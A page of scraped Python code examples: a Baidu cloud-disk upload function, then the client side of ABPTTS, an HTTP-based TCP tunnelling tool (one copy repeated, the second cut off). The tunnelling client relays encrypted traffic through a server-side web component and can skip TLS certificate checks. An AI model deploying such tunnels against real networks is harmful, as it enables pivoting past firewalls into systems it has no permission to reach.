            'size':os.stat(filename).st_size ,
            'block_list':"[\""+file_md5+"\"]",
            'method':'post',
            })
        urllib2.install_opener(self.opener)
        headers = {
            'Accept':'*/*', 'Accept-Encoding':'gzip,deflate,sdch',
            'Accept-Language':'zh-CN,zh;q=0.8', 'Connection':'keep-alive',
            'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
            'Host':'pan.baidu.com', 'Origin':'http://pan.baidu.com',
            'Referer':'http://pan.baidu.com/disk/home',
            'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36',
            'X-Requested-With':'XMLHttpRequest', }
        req = urllib2.Request(create_file_url,post_data,headers=headers)

        #
        #处理创建操作的结果。errno值为0为创建成功,并返回文件id,服务器文件名,大小等信息。
        #
        result = urllib2.urlopen(req).read()
        logger.debug( result )
        errno = json.loads(result)["errno"]
        if errno != 0 :
            logger.debug( errno )
            logger.info("create file failed")

        #计算结束时间,和上传速度
        endtime = time.time()
        logger.debug(endtime)
        usedtime = endtime - starttime
        speed = json.loads(result)['size'] / usedtime

        logger.info( "It is used :%ds " % usedtime)
        logger.info( "speed :%dbyte/s " % speed)
        logger.info( "upload file to " + json.loads(result)['path'] )

        #返回上传文件md5值
        return file_md5

Example 18

Project: baidu_http_pan
Source File: baiduyun.py
View license
    def upload_yunpan(self,filename,destdir):
        if self.bdstoken == '' :
            sys.exit(1)


        if self.BDUSS == '' :
            logger.info("login failed,please relogin")
            sys.exit(1)
        #记录开始时间
        starttime = time.time()
        logger.debug(starttime)
        
        # 上传文件,使用post方法,
        #   参数 1 cookie中的BDUSS,
        #  post文件需要encode变换,所以采用curl命令方式,防止python处理文件超大出现异常,
        #
        upload_file_url = 'http://c.pcs.baidu.com/rest/2.0/pcs/file?' + urllib.urlencode({'BDUSS':self.BDUSS,
                    'method':'upload', 'type':'tmpfile', 'app_id':'250528', })
        logger.debug(upload_file_url)

        # fields = []
        # files = [('Filedata', filename, open(filename, 'rb'))]

        # iterate and write chunk in a socket
        # content_type, body = MultipartFormdataEncoder().encode(fields, files)
        # headers = {
        #     'Content-Type': content_type,
        #     'Content-Length': str(len(body)),
        #     }
        # req = urllib2.Request(upload_file_url,body,headers=headers)
        # page = urllib2.urlopen(req)

        curl_command = [ 'curl', '-b', self.cookiename, '-F', "[email protected]%s" % filename,
                    upload_file_url ]
        logger.debug(curl_command)
        
        #处理curl命令
        from subprocess import Popen, PIPE
        process = Popen(curl_command, stdout=PIPE)
        result = process.stdout.read()
        process.wait()              # Wait for it to complete

        #抽取返回字符串,字符串含百度云检测文件的md5值,和requestid
        file_md5= json.loads(result)['md5']

        logger.debug("update website result string:%s",result)
        logger.debug("update file md5 sume:%s",file_md5)

        #
        # 将刚刚上传的文件创建到自己的云目录。
        # 参数 1 bdstoken
        #     2 要保存的文件的目录
        #     3 文件的大小
        #     4 文件的md5值
        create_file_url = 'http://pan.baidu.com/api/create?' + urllib.urlencode({ 'a':'commit',
                            'channel':'chunlei', 'clienttype':'0', 'web':'1',
                            'bdstoken':self.bdstoken,
                        })
        logger.debug("create file file url:%s",create_file_url)

        post_data = urllib.urlencode( {
             'path':destdir + '/' + os.path.basename(filename),
            'isdir':'0',
            'size':os.stat(filename).st_size ,
            'block_list':"[\""+file_md5+"\"]",
            'method':'post',
            })
        urllib2.install_opener(self.opener)
        headers = {
            'Accept':'*/*', 'Accept-Encoding':'gzip,deflate,sdch',
            'Accept-Language':'zh-CN,zh;q=0.8', 'Connection':'keep-alive',
            'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
            'Host':'pan.baidu.com', 'Origin':'http://pan.baidu.com',
            'Referer':'http://pan.baidu.com/disk/home',
            'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36',
            'X-Requested-With':'XMLHttpRequest', }
        req = urllib2.Request(create_file_url,post_data,headers=headers)

        #
        #处理创建操作的结果。errno值为0为创建成功,并返回文件id,服务器文件名,大小等信息。
        #
        result = urllib2.urlopen(req).read()
        logger.debug( result )
        errno = json.loads(result)["errno"]
        if errno != 0 :
            logger.debug( errno )
            logger.info("create file failed")

        #计算结束时间,和上传速度
        endtime = time.time()
        logger.debug(endtime)
        usedtime = endtime - starttime
        speed = json.loads(result)['size'] / usedtime

        logger.info( "It is used :%ds " % usedtime)
        logger.info( "speed :%dbyte/s " % speed)
        logger.info( "upload file to " + json.loads(result)['path'] )

        #返回上传文件md5值
        return file_md5

Example 19

Project: ABPTTS
Source File: abpttsclient.py
View license
def child(clientsock, clientAddr, listeningAddress, forwardingURL, destAddress, destPort):
	global clientToServerBuffer
	global socketTimeoutCurrent
	try:
		formattedServerAddress = '%s:%s' % (destAddress, destPort)
		formattedClientAddress = '%s:%s' % (clientAddr[0], clientAddr[1])
		socketTimeoutCurrent = conf.clientSocketTimeoutBase
		clientsock.settimeout(socketTimeoutCurrent)
		closeConnections = 0
		runChildLoop = 1
		if conf.accessKeyMode == "header":
			headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', conf.headerNameKey: conf.headerValueKey, 'Connection': 'close'}
		else:
			headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
		connectionID = ""
		cookieVal = ""
		body = {}
		http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
		response = ""
		content = ""
		cookieVal = ""
		
		try:
			outputHandler.outputMessage('Connecting to %s:%i via %s' % (destAddress, destPort, forwardingURL))
			
			plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
			
			if len(encryptionKey) > 0:
				#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
				#print "Plaintext message: " + plaintextMessage
				ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
				if conf.accessKeyMode == "header":
					body = {conf.paramNameEncryptedBlock: ciphertextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
			else:
#				body = {conf.paramNameOperation: conf.opModeStringOpenConnection, conf.paramNameDestinationHost: destAddress, conf.paramNameDestinationPort: destPort }
				plaintextMessage = base64.b64encode(plaintextMessage)
				if conf.accessKeyMode == "header":
					body = {conf.paramNamePlaintextBlock: plaintextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
			encodedBody = urllib.urlencode(body)
			if conf.echoHTTPBody:
				outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, '', 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
			
			http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
			response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
			content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
			cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
			headers['Cookie'] = cookieVal
			if conf.responseStringConnectionCreated in content:
				responseArray = content.split(" ")
				if len(responseArray) > 1:
					connectionID = responseArray[1]
					outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Server created connection ID %s' % (connectionID))
			else:
				runChildLoop = 0
				outputHandler.outputMessage('Error: could not create connection. Raw server response: ' + content)
				
			iterationCounter = 0
			clientSentByteCounter = 0
			serverSentByteCounter = 0
			clientHasClosedConnection = False
				
			while runChildLoop == 1:
				clientMessageB64 = ""
				serverMessageB64 = ""
				content = ""
				scaleSocketTimeoutUp = False
				scaleSocketTimeoutDown = False
				clientSocketTimedOut = False
				trafficSent = False
				
				if clientHasClosedConnection == False:
					try:
						currentFromClient = clientsock.recv(conf.clientSocketBufferSize)
						if currentFromClient:
							clientToServerBuffer += currentFromClient
						else:
							clientHasClosedConnection = True					

					except socket.error as e:
						if "timed out" not in str(e):
							raise e
						else:
							clientSocketTimedOut = True

				c2sBufferLength = len(clientToServerBuffer)
				if c2sBufferLength > 0:
					trafficSent = True
					toServerByteCount = conf.clientToServerBlockSize
					if toServerByteCount > c2sBufferLength:
						toServerByteCount = c2sBufferLength
					fromClient = ""
					if toServerByteCount < c2sBufferLength:
						fromClient = clientToServerBuffer[0:toServerByteCount]
						clientToServerBuffer = clientToServerBuffer[toServerByteCount:]
					else:
						fromClient = clientToServerBuffer[:]
						clientToServerBuffer = ""
					clientSentByteCounter = clientSentByteCounter + len(fromClient)
					
					clientMessageB64 = base64.b64encode(fromClient)
					if conf.echoDebugMessages:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%s%i bytes' % (os.linesep, len(fromClient)))
					if conf.echoData:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, clientMessageB64))
				else:
					if clientHasClosedConnection:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Client closed channel')
						clientMessageB64 = ""
						runChildLoop = 0
						closeConnections = 1
							
				try:
					plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
					if len(encryptionKey) > 0:
						#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
						ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
						if conf.echoData:
							outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, ciphertextMessage))
						if conf.accessKeyMode == "header":
							body = {conf.paramNameEncryptedBlock: ciphertextMessage }
						else:
							body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
					else:
						#body = {conf.paramNameOperation: conf.opModeStringSendReceive, conf.paramNameConnectionID: connectionID, conf.paramNameData: clientMessageB64 }
						plaintextMessage = base64.b64encode(plaintextMessage)
						
						if conf.accessKeyMode == "header":
							body = {conf.paramNamePlaintextBlock: plaintextMessage }
						else:
							body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }

					encodedBody = urllib.urlencode(body)
					if conf.echoHTTPBody:
							outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
					response = []
					madeRequest = False
					httpRetryCount = 0
					while madeRequest == False:
						try:
							response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
							madeRequest = True
						except Exception as e:
							httpRetryCount += 1
							if httpRetryCount > httpRequestRetryLimit:
								outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request retry limit of %i has been reached, and this request will not be retried. Final error was: %s' % (httpRequestRetryLimit, e))
								madeRequest = True
							else:
								outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request failed with the following message: %s. This request will be retried up to %i times.' % (e, httpRequestRetryLimit))
								time.sleep(httpRequestRetryDelay)
					
					content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
					cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
					headers['Cookie'] = cookieVal
				except Exception as e:
					raise e
				
				serverClosedConnection = False
				
				try:
					srb = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
					#print '"' + srb + '"'
					srbArray = srb.split(" ", 1)
					fromServer = ""
					if len(srbArray) > 1:
						if srbArray[0] == conf.responseStringData:
							fromServerB64 = srbArray[1]
							fromServer = base64.b64decode(fromServerB64)
							if len(encryptionKey) > 0:
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, fromServerB64))
								fromServer = decrypt(fromServer, str(encryptionKey), encryptionBlockSize)
								#print '"' + fromServer + '"'
							else:
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, fromServerB64))							
							fullMessageSize = len(fromServer)
							numBlocks = int(math.ceil(float(fullMessageSize) / float(conf.clientBlockSizeLimitFromServer)))
							if conf.echoDebugMessages:
								if numBlocks > 1:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Splitting large block (%i bytes) into %i blocks for relay to client' % (fullMessageSize, numBlocks))
							for blockNum in range(0, numBlocks):
								firstByte = blockNum * conf.clientBlockSizeLimitFromServer
								lastByte = (blockNum + 1) * conf.clientBlockSizeLimitFromServer
								if lastByte > fullMessageSize:
									lastByte = fullMessageSize
								currentBlock = fromServer[firstByte:lastByte]
								serverSentByteCounter = serverSentByteCounter + len(currentBlock)
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, base64.b64encode(currentBlock)))
								if conf.echoDebugMessages:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '(Block %i/%i) %i bytes' % (blockNum + 1, numBlocks, len(currentBlock)))
								try:
									clientsock.send(currentBlock)
								except Exception as e:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error sending to client - %s' % (e))
								if conf.clientBlockTransmitSleepTime > 0.0:
									if blockNum < (numBlocks - 1):
										time.sleep(conf.clientBlockTransmitSleepTime)
					else:
						foundResponseType = False
						if srb == conf.responseStringNoData:
							foundResponseType = True
							if conf.echoDebugMessages:
								outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'No data to receive from server at this time')
						else:
							trafficSent = True
						if srb == conf.responseStringErrorInvalidRequest:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the request was invalid. Verify that that you are using a client configuration compatible with the server-side component.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionOpenFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the requested connection could not be opened. You may have requested a destination host/port that is inaccessible to the server, the server may have exhausted ephemeral ports (although this is unlikely), or another component (e.g. firewall) may be interfering with connectivity.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionSendFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while sending data over the TCP connection.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionReceiveFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while receiving data over the TCP connection.')
							foundResponseType = True
						if srb == conf.responseStringErrorDecryptFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported a decryption failure. Verify that the encryption keys in the client and server configurations match.')
							foundResponseType = True
						if srb == conf.responseStringErrorEncryptFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported an encryption failure. Verify that the encryption keys in the client and server configurations match.')
							foundResponseType = True
						if srb == conf.responseStringErrorEncryptionNotSupported:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that it does not support encryption. Verify that that you are using a client configuration compatible with the server-side component.')
							foundResponseType = True
						if foundResponseType == False:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Unexpected response from server: %s' % (content))
							serverClosedConnection = True
					
					if conf.responseStringConnectionClosed in content:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server explicitly closed connection ID %s' % (connectionID))
						serverClosedConnection = True
					if conf.responseStringErrorConnectionNotFound in content:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that connection ID %s was not found - assuming connection has been closed.' % (connectionID))
						serverClosedConnection = True				
				except socket.error as e:
					if "timed out" not in str(e):
						raise e
						
				if trafficSent:
					scaleSocketTimeoutDown = True
					scaleSocketTimeoutUp = False
				else:
					scaleSocketTimeoutDown = False
					scaleSocketTimeoutUp = True
					
				if serverClosedConnection == True:
					runChildLoop = 0
					closeConnections = 1
					try:
						responseArray = content.split(" ")
						if len(responseArray) > 1:
							connectionID = responseArray[1]
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s' % (connectionID))
						else:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without specifying its ID' % (connectionID))
					except:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without sending a response' % (connectionID))
						
				iterationCounter = iterationCounter + 1
				if iterationCounter > conf.statsUpdateIterations:
					outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (clientSentByteCounter))
					outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (serverSentByteCounter))
					iterationCounter = 0
					clientSentByteCounter = 0
					serverSentByteCounter = 0
					
				if runServer == 0:
					outputHandler.outputMessage('Server shutdown request received in thread for connection ID %s' % (connectionID))
					runChildLoop = 0
					closeConnections = 1
				else:
					if conf.autoscaleClientSocketTimeout:
						# scale socket timeout up/down if the criteria for doing so was met
						timeoutChange = 0.0
						#global socketTimeoutCurrent
						newSocketTimeout = socketTimeoutCurrent
						if scaleSocketTimeoutDown or scaleSocketTimeoutUp:
							timeoutChange = conf.clientSocketTimeoutScalingMultiplier * socketTimeoutCurrent
						if scaleSocketTimeoutDown:
							newSocketTimeout = conf.clientSocketTimeoutMin
						if scaleSocketTimeoutUp:
							newSocketTimeout = socketTimeoutCurrent + timeoutChange
						# make sure socket timeout is within specified range
						if newSocketTimeout < conf.clientSocketTimeoutMin:
							newSocketTimeout = conf.clientSocketTimeoutMin
						if newSocketTimeout > conf.clientSocketTimeoutMax:
							newSocketTimeout = conf.clientSocketTimeoutMax
						if newSocketTimeout != socketTimeoutCurrent:
							if conf.echoDebugMessages:
								outputHandler.outputMessage('[Connection ID %s]: Client-side socket timeout has been changed from %f to %f' % (connectionID, socketTimeoutCurrent, newSocketTimeout))
							socketTimeoutCurrent = newSocketTimeout
							
						# apply random socket timeout variation
						timeoutVar = random.uniform(clientSocketTimeoutVariationNeg, conf.clientSocketTimeoutVariation)
						timeoutModifier = (socketTimeoutCurrent * timeoutVar)
						effectiveTimeout = (socketTimeoutCurrent + timeoutModifier)
						if conf.echoDebugMessages:
							outputHandler.outputMessage('[Connection ID %s]: Applying random variation of %f to client-side socket timeout for this iteration - timeout will be %f' % (connectionID, timeoutModifier, effectiveTimeout))
							
						clientsock.settimeout(effectiveTimeout)
					

		except Exception as e:
			outputHandler.outputMessage('Connection-level exception: %s in thread for tunnel (%s -> %s -> %s)' % (e, formattedClientAddress, listeningAddress, formattedServerAddress))
			closeConnections = 1
			runChildLoop = 0
		if closeConnections == 1:
			outputHandler.outputMessage('Disengaging tunnel (%s -> %s -> %s)' % (formattedClientAddress, listeningAddress, formattedServerAddress))
			outputHandler.outputMessage('Closing client socket (%s -> %s)' % (formattedClientAddress, listeningAddress))
			try:
				clientsock.shutdown(1)
				clientsock.close()
			except Exception as e2:
				outputHandler.outputMessage('Exception while closing client socket (%s -> %s): %s' % (formattedClientAddress, listeningAddress, e2))
			plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
			if len(encryptionKey) > 0:
				#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
				ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
				if conf.accessKeyMode == "header":
					body = {conf.paramNameEncryptedBlock: ciphertextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }

			else:
				#body = {conf.paramNameOperation: conf.opModeStringCloseConnection, conf.paramNameConnectionID: connectionID }
				plaintextMessage = base64.b64encode(plaintextMessage)
				if conf.accessKeyMode == "header":
					body = {conf.paramNamePlaintextBlock: plaintextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
			
			http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
			response, content = http.request(forwardingURL, 'POST', headers=headers, body=urllib.urlencode(body))
			content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
			cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
			headers['Cookie'] = cookieVal
			if conf.responseStringConnectionClosed in content:
				responseArray = content.split(" ")
				if len(responseArray) > 1:
					connectionID = responseArray[1]
					outputHandler.outputMessage('Server closed connection ID %s' % (connectionID))
			else:
				outputHandler.outputMessage('Error: could not close connection ID %s (may have already been closed on the server). Raw server response: %s' % (connectionID, content))
		else:
			outputHandler.outputMessage("Unexpected state: child loop exited without closeConnections being set to 1")

	except Exception as bigE:
		outputHandler.outputMessage("High-level exception: %s" % (str(bigE)))

Example 20

Project: ABPTTS
Source File: abpttsclient.py
View license
def child(clientsock, clientAddr, listeningAddress, forwardingURL, destAddress, destPort):
	global clientToServerBuffer
	global socketTimeoutCurrent
	try:
		formattedServerAddress = '%s:%s' % (destAddress, destPort)
		formattedClientAddress = '%s:%s' % (clientAddr[0], clientAddr[1])
		socketTimeoutCurrent = conf.clientSocketTimeoutBase
		clientsock.settimeout(socketTimeoutCurrent)
		closeConnections = 0
		runChildLoop = 1
		if conf.accessKeyMode == "header":
			headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', conf.headerNameKey: conf.headerValueKey, 'Connection': 'close'}
		else:
			headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
		connectionID = ""
		cookieVal = ""
		body = {}
		http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
		response = ""
		content = ""
		cookieVal = ""
		
		try:
			outputHandler.outputMessage('Connecting to %s:%i via %s' % (destAddress, destPort, forwardingURL))
			
			plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
			
			if len(encryptionKey) > 0:
				#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
				#print "Plaintext message: " + plaintextMessage
				ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
				if conf.accessKeyMode == "header":
					body = {conf.paramNameEncryptedBlock: ciphertextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
			else:
#				body = {conf.paramNameOperation: conf.opModeStringOpenConnection, conf.paramNameDestinationHost: destAddress, conf.paramNameDestinationPort: destPort }
				plaintextMessage = base64.b64encode(plaintextMessage)
				if conf.accessKeyMode == "header":
					body = {conf.paramNamePlaintextBlock: plaintextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
			encodedBody = urllib.urlencode(body)
			if conf.echoHTTPBody:
				outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, '', 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
			
			http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
			response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
			content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
			cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
			headers['Cookie'] = cookieVal
			if conf.responseStringConnectionCreated in content:
				responseArray = content.split(" ")
				if len(responseArray) > 1:
					connectionID = responseArray[1]
					outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Server created connection ID %s' % (connectionID))
			else:
				runChildLoop = 0
				outputHandler.outputMessage('Error: could not create connection. Raw server response: ' + content)
				
			iterationCounter = 0
			clientSentByteCounter = 0
			serverSentByteCounter = 0
			clientHasClosedConnection = False
				
			while runChildLoop == 1:
				clientMessageB64 = ""
				serverMessageB64 = ""
				content = ""
				scaleSocketTimeoutUp = False
				scaleSocketTimeoutDown = False
				clientSocketTimedOut = False
				trafficSent = False
				
				if clientHasClosedConnection == False:
					try:
						currentFromClient = clientsock.recv(conf.clientSocketBufferSize)
						if currentFromClient:
							clientToServerBuffer += currentFromClient
						else:
							clientHasClosedConnection = True					

					except socket.error as e:
						if "timed out" not in str(e):
							raise e
						else:
							clientSocketTimedOut = True

				c2sBufferLength = len(clientToServerBuffer)
				if c2sBufferLength > 0:
					trafficSent = True
					toServerByteCount = conf.clientToServerBlockSize
					if toServerByteCount > c2sBufferLength:
						toServerByteCount = c2sBufferLength
					fromClient = ""
					if toServerByteCount < c2sBufferLength:
						fromClient = clientToServerBuffer[0:toServerByteCount]
						clientToServerBuffer = clientToServerBuffer[toServerByteCount:]
					else:
						fromClient = clientToServerBuffer[:]
						clientToServerBuffer = ""
					clientSentByteCounter = clientSentByteCounter + len(fromClient)
					
					clientMessageB64 = base64.b64encode(fromClient)
					if conf.echoDebugMessages:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%s%i bytes' % (os.linesep, len(fromClient)))
					if conf.echoData:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, clientMessageB64))
				else:
					if clientHasClosedConnection:
						outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Client closed channel')
						clientMessageB64 = ""
						runChildLoop = 0
						closeConnections = 1
							
				try:
					plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
					if len(encryptionKey) > 0:
						#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
						ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
						if conf.echoData:
							outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, ciphertextMessage))
						if conf.accessKeyMode == "header":
							body = {conf.paramNameEncryptedBlock: ciphertextMessage }
						else:
							body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
					else:
						#body = {conf.paramNameOperation: conf.opModeStringSendReceive, conf.paramNameConnectionID: connectionID, conf.paramNameData: clientMessageB64 }
						plaintextMessage = base64.b64encode(plaintextMessage)
						
						if conf.accessKeyMode == "header":
							body = {conf.paramNamePlaintextBlock: plaintextMessage }
						else:
							body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }

					encodedBody = urllib.urlencode(body)
